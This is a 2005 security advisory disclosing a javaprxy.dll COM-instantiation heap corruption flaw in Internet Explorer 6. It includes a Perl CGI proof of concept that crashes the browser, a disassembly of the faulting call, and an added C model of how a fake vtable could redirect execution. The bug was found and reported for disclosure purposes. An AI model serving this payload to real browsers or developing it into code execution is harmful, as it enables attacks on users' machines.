SEC-CONSULT Security Advisory < 20050629-0 >
==================================================================================
              title: IE6 javaprxy.dll COM instantiation heap corruption vulnerability
            program: Internet Explorer
 vulnerable version: 6.0.2900.2180
           homepage: www.microsoft.com
              found: 2005-06-17
                 by: sk0L & Martin Eiszner / SEC-CONSULT / www.sec-consult.com
==================================================================================

background:
---------------
Internet Explorer supports instantiation of non-ActiveX controls, e.g. plain COM
objects, via <object> tags. According to Microsoft, COM components respond
gracefully to attempts to treat them as non-ActiveX controls. On the contrary, we
found that at least 20 of the objects available on an average XP system either
lead to an instant crash or to an exception after a few reloads.

vulnerability overview:
---------------
Loading HTML documents with certain embedded CLSIDs results in null-pointer
exceptions or memory corruption. In one case, we could leverage this bug to
overwrite a function pointer in the data segment. It *may* be possible to exploit
this issue to execute arbitrary code in the context of IE.

proof of concept:
---------------
This simple CGI should crash IE.
---------------
#!/usr/bin/perl
# in order for this to work javaprxy.dll must be available on the client.
use strict;
use warnings;

my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # javaprxy.dll

# The <object> markup was lost from this copy of the advisory; it is restored
# here from the advisory's own description: a plain <object> tag carrying the
# CLSID, with no ActiveX-specific attributes.
my $html1 = "<html><body>\n<object classid=\"CLSID:$clsid\"></object>\n";
my $html2 = "\n</body></html>\n";

print "Content-Type: text/html\r\n\r\n";
# 30000 'A's as page text; IE keeps them as UTF-16LE (41 00 41 00 ...),
# which is where the eax=00410041 below comes from.
print $html1.("A"x30000).$html2;
---------------
On our lab machine we end up with eax=00410041, and an exception occurs at the
following location in javaprxy.dll:
---------------
.text:7C508660    mov     eax, [ecx]
.text:7C508662    test    eax, eax
.text:7C508664    jz      short locret_7C50866C
.text:7C508666    mov     ecx, [eax]
.text:7C508668    push    eax
.text:7C508669    call    dword ptr [ecx+8]
---------------
As you can see, this situation may be exploitable, considering that we have some
level of control over eax: 0x00410041 is the UTF-16LE encoding of "AA", so the
pointer loaded from [ecx] now points into memory that has been overwritten with
the page's filler text. The code then treats the first dword at that address as
a vtable pointer (mov ecx, [eax]) and calls through its third slot ([ecx+8], the
position of IUnknown::Release in any COM interface). Whoever controls the bytes
at that location controls the call target; with 'A's it faults at the
dereference, with a valid pointer to attacker-chosen memory it would not.
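To make the dispatch in the listing concrete, the following C program is an added example (not part of the advisory and not code from javaprxy.dll). It models the six instructions as a source-level function and runs it against three states of the same heap chunk: the intact object, the chunk refilled with the PoC's UTF-16LE 'A's (which reproduces the 0x00410041 value without dereferencing it), and the chunk refilled with a pointer to a fake vtable, which is the case the "some level of control over eax" remark points at. All names (IUnknownLike, VTable, Proxy, proxy_release_inner, demo_*) are illustrative, and the program assumes a little-endian host.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example: a model of the six instructions in the javaprxy.dll listing.
 * Names are illustrative and not taken from the DLL. Assumes little-endian. */

typedef struct IUnknownLike IUnknownLike;

/* COM-style vtable: slot 2 sits at byte offset 8 on 32-bit, which is where
 * IUnknown::Release lives and what "call dword ptr [ecx+8]" reaches. */
typedef struct {
    long          (*QueryInterface)(IUnknownLike *self);
    unsigned long (*AddRef)(IUnknownLike *self);
    unsigned long (*Release)(IUnknownLike *self);
} VTable;

struct IUnknownLike {
    const VTable *vtbl;       /* first field: "mov ecx,[eax]" reads this */
    unsigned long refcount;
};

/* The wrapper whose first field is the interface pointer ("mov eax,[ecx]"). */
typedef struct { IUnknownLike *inner; } Proxy;

static long          qi_stub(IUnknownLike *s)      { (void)s; return 0; }
static unsigned long addref_real(IUnknownLike *s)  { return ++s->refcount; }
static unsigned long release_real(IUnknownLike *s) { return --s->refcount; }
static const VTable real_vtbl = { qi_stub, addref_real, release_real };

/* Source-level equivalent of the listing. */
static unsigned long proxy_release_inner(Proxy *p)
{
    IUnknownLike *obj = p->inner;          /* mov  eax, [ecx]          */
    if (obj == NULL)                       /* test eax, eax ; jz       */
        return 0;
    const VTable *vt = obj->vtbl;          /* mov  ecx, [eax]          */
    return vt->Release(obj);               /* push eax ; call [ecx+8]  */
}

/* One heap chunk: holds the real object first, then gets reused for page
 * text. The union views the same bytes as the object the proxy still holds. */
static union {
    IUnknownLike  obj;
    unsigned char raw[sizeof(IUnknownLike)];
} chunk;

/* Case 1: object intact, Release just drops the reference count. */
unsigned long demo_intact(void)
{
    chunk.obj.vtbl = &real_vtbl;
    chunk.obj.refcount = 2;
    Proxy p = { &chunk.obj };
    return proxy_release_inner(&p);        /* 1 */
}

/* Case 2: the chunk is refilled with the PoC's "AAAA..." page text as IE
 * stores it, UTF-16LE (41 00 41 00 ...). The vtable field then reads
 * 0x00410041 in its low 32 bits, the eax the advisory observed. The value is
 * returned, not dereferenced: "mov ecx,[eax]" on it is the listing's fault. */
uintptr_t demo_filled_vtbl(void)
{
    static const unsigned char wide_a[2] = { 'A', 0x00 };
    for (size_t i = 0; i < sizeof chunk.raw; i++)
        chunk.raw[i] = wide_a[i % 2];
    return (uintptr_t)chunk.obj.vtbl;
}

/* Case 3: if the refilled bytes hold a valid pointer to attacker-chosen
 * memory instead of 'A's, slot 2 of that fake vtable is what gets called. */
static unsigned long attacker_release(IUnknownLike *s) { (void)s; return 0xDEADBEEFUL; }
static const VTable fake_vtbl = { qi_stub, addref_real, attacker_release };

unsigned long demo_hijacked(void)
{
    uintptr_t fake = (uintptr_t)&fake_vtbl;
    memcpy(chunk.raw, &fake, sizeof fake); /* overwrite just the vtbl field */
    Proxy p = { &chunk.obj };
    return proxy_release_inner(&p);        /* 0xDEADBEEF: attacker_release ran */
}

int main(void)
{
    printf("intact release -> refcount %lu\n", demo_intact());
    printf("after 'A' fill -> vtbl = 0x%lx (faults if dereferenced)\n",
           (unsigned long)demo_filled_vtbl());
    printf("fake vtable    -> Release returned 0x%lx\n", demo_hijacked());
    return 0;
}
```

The point of the third case is that the null check in the listing (test eax, eax) only guards against a cleared pointer, not against a stale one; once the chunk is reused, whatever sits in its first pointer-sized bytes is trusted as a vtable. Defensive code in the same position cannot tell the two apart, which is why the fix has to be in the object's lifetime handling (Microsoft's "more robust" COM handling below), not in this call site.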
vulnerable versions:
---------------
javaprxy.dll 5.00.3810
internet explorer 6.0.2900.2180.xpsp_sp2_gdr.050301-1519

These are the versions tested; other versions may of course be vulnerable.

vendor status:
---------------
vendor notified: 2005-06-17
vendor response: 2005-06-17
patch available: ?

Microsoft does not confirm the vulnerability, as their product team cannot
reproduce the condition. However, they are looking at making changes to handle
COM objects in a more robust manner in the future.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
< Bernhard Müller / Martin Eiszner > / www.sec-consult.com / SGT
::: walter|bruder, flo, tke, dfa :::